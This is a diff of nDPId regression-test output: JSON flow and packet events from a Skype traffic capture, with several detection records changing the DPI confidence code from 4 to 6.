00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431970635827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970635827,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rmUAAEARSNXAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} @@ -76,15 +76,15 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431970635828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970635828,"pkt":"0NQSxnP1PBXCt3IOCABFAABLGiMAAEAR3QvAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1431970636044,"pkt":"PBXCt3IO0NQSxnP1CABFAAD5QB1AADEGlPMRj6CVwKgBIhRnxOfKLqrmIALxFIAYAQoi5AAAAQEIClVX3cw+MS9sFwMBAMAQLvPrUolszeBH4PjooKgoykESMntuxk1Te2w+x8Oya6GSybBw6qqEM+wWK2sXwWrrizJ5XKzKOAmSZesb7xCcv3da\/+28YcXK\/F7zVFmE31vvvLV8YkG8GBOlPbpZKZERb9mwy2LwmHQtz7O0hAoAaXw9xzeYM92S6l8kX5r5cFIIVhHHc18X56Qt2VFcbjB+OTKH9K3bn722DOl83K579IAjLFDRbrYAdebZ2GL8xgCQwxYSG690LowE4mV3zjs="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636044,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":1,"thread_ts_msec":1431970636044,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1431970636044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K69AAEAGmybAqAEiEY+glcTnFGcgAvEUyi6rq4AQD\/mVBgAAAQEICj4xjDlVV93M"} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1431970636045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431970636045,"pkt":"0NQSxnP1PBXCt3IOCABFAACO6xNAAEAG22fAqAEiEY+glcTnFGcgAvEUyi6rq4AYEAB7VwAAAQEICj4xjDlVV93MFwMBACDcBm8C5CuEds5WH7uOVSaoSAeWe3pVfjpiQwGsBHUCdhcDAQAwqX6WBIxQfVe36rHY2TMg9Ev1HCHJmLbDku3Ki37TObTq6YVIEEF1VGVKw\/q+D6y6"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431970636300,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636300,"pkt":"0NQSxnP1PBXCt3IOCABFAABLV\/cAAEARnzfAqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636300,"flow_last_seen":1431970636300,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636300,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431970636301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636301,"pkt":"0NQSxnP1PBXCt3IOCABFAABLvh0AAEARORHAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636301,"flow_last_seen":1431970636301,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970636301,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431970636420,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ONsAAEARvmTAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} @@ -102,7 +102,7 @@ 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIxUAAEAR1BnAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLkYQAAEARZarAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} @@ -110,122 +110,122 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1431970637443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970637443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6+FgAAEAR\/ubAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABLoPEAAEARVj3AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/NIAAEAR+lvAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00657{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00657{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431970642408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkRoAAEARZRPAqAEiwKgB\/wCJAIkAOosFRXIBEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1431970642408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOP7YAAEARtnfAqAEiwKgB\/wCJAIkAOrIIRXEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1431970642409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642409,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkDsAAEARZfLAqAEiwKgB\/wCJAIkAOrIDRXYBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 